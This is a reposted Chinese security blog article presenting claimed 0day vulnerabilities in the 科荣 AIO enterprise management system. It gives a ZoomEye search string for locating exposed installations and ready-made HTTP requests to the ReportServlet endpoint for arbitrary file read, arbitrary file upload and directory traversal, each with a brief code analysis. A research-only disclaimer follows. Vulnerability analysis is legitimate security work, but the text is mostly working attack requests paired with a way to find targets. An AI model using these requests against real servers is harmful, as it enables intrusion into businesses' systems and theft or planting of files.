前言
科荣AIO 企业⼀体化管理解决⽅案 通过ERPERP(进销存财务)、OAOA(办公⾃动化)、CRMCRM(客⼾关系管理)、UDPUDP(⾃定义平台),集电⼦商务平台、⽀付平台、ERP 平台、微信平台、移动APP 等解决了众多企业客⼾在管理过程中跨部⻔、多功能、需求多变等通⽤及个性化的问题。
搜索引擎
ZoomEye: "changeAccount('8000')"
漏洞复现
新版本
任意文件读取
http://xxxxx/ReportServlet?operation=getPicFile&fileName=/DISKC/Windows/Win.ini
代码分析
当operation的值为getPicFile,将传入的fileName参数值进行判断是否以"/DISK"开头并且不为空,如果不为空并以"/DISK"开头进行截取如:/DISKC/Windows/Win.ini ==>DISKC/Windows/Win.ini,接着判断是否"DISK"开头,如果不为空并以"DISK"开头又进行截取然后拼接: 如DISKC/Windows/Win.ini==>C:/Windows/Win.ini最后进行文件读取下载。
老版本
任意文件上传
POST/ReportServlet?operation=saveFormatFile&fileName=demo.css&language=HTTP/1.1Host: xxxxxxConnection: loseContent-Type: application/x-www-form-urlencodedContent-Length: 2demo
代码分析
代码很直接获取POST输入流将内容写到指定fileName中,由于fileName未进行过滤导致可以进行越级上传。
目录遍历
http://xxxxxx/ReportServlet?operation=getFileList&path=../../../
代码分析
直接将path带入进行拼接然后遍历输出。
原文始发于微信公众号(安全绘景):0day | 科荣 AIO任意文件上传/目录遍历/任意文件读取漏洞分析
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论